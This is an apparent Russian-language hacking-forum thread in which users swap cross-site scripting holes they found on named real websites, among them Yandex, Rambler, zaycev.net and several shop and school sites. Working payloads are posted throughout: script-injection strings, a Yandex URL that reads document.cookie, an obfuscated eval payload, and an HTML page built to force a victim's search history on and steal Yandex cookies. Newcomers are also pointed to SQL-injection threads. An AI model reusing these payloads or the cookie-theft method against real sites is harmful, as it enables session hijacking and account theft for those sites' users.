foopi, l1ght, sabe не сочтите конечно за наглость или необразованность скорее все вместе подскажите какую литературу надо учить. ? Есть желание, возможности и время. А с чего начать?
это все хорошо но команды языки ?, я вот в этом деле новенький, понимаешь вот как говорил, есть желание. Но а в подробностях, это все узнать как . Ксати там есть уже результат можете глянуть)
для начала научись пользоваться мозгом и дуй в другой раздел, здесь идет обсуждение совсем других вопросов.
например можеш освоить sql inject http://forum.antichat.ru/thread43966.html http://forum.antichat.ru/thread19844.html по возникшим вопросам сюда.. http://forum.antichat.ru/lastpostinthread46016.html
Code: liter.kz Code: zaycev.net В обоих уязвимо поле поиска. Код: Code: '><script>alert('xss')</script>
RAMBLER.RU http://id-planet.rambler.ru/other/education/add Добавляем учебное заведение, уязвимы поля "Название:" и "Факультет / Специализация:"
http://www.ecco-shoes.ru/rsm/gallery/ там слева поля для поиска - 5 штук. Имя Фамилия Электронная почта Город Ключевое слово Во всех XSS)))))))) "><script>alert('ГОЛО_СУЕМ')</script>
yandex.ru http://passport.yandex.ru/passport?mode=auth&retpath=http%3A%2F%2Fimages.yandex.ru%2Fyandsearch%3Fp%3D20%26text%3Dwhack%26rpt%3D%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E%26login
Яндекс. На Яндексе есть такой сервис- "Мои находки" (nahodki.yandex.ru). Если запись истории включена, то на странице http://nahodki.yandex.ru/results.xml мы можем наблюдать свои поисковые запросы, и эти строки не фильтруются. Что нам нужно сделать, чтобы поиметь чужие куки: "Насильно" включить юзеру запись истории Послать яндексу ядовитый поисковый запрос Направить юзера на зараженную страницу истории запросов Для этого будем направлять жертву на специальную страницу(через iframe сделать не удалось, т.к. яндекс не разрешает показывать свои страницы во фреймах). Кодес: Code: <html> <body onload="location.href='http://nahodki.yandex.ru/';"> <img src="http://nahodki.yandex.ru/save_tunes.xml?store=1"> <img src="http://yandex.ru/yandsearch?clid=14585&text=[COLOR=Yellow][B]тут_наш_злобнокодес[/B][/COLOR]"> </body> </html>
Code: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Миракаль</title> </head> <frameset rows="30,30,30" cols="*"> <frame src="http://rambler.ru" name="rambler" scrolling="no" noresize> <frame src="http://yandex.ru" name="yandex" scrolling="no" noresize> <frame src="http://google.ru" name="google" scrolling="no" noresize> </frameset> </html>
otake.ru В "псто" вставляем какбэ картинку: Code: javascript:eval(String.fromCharCode.....) только для риальне воене!!!1
http://www.schoolport.ru/ В форуме, при создании темы, уязвимы все поля... В принципе он съедает любой джава код, так что писать что я туды закидывал не надо...